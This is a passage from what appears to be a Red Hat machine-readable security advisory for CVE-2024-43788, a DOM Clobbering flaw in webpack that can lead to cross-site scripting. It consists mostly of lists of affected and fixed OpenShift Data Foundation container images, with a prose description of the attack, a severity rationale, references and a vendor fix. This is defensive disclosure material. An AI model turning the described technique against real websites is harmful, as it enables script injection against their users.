"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", 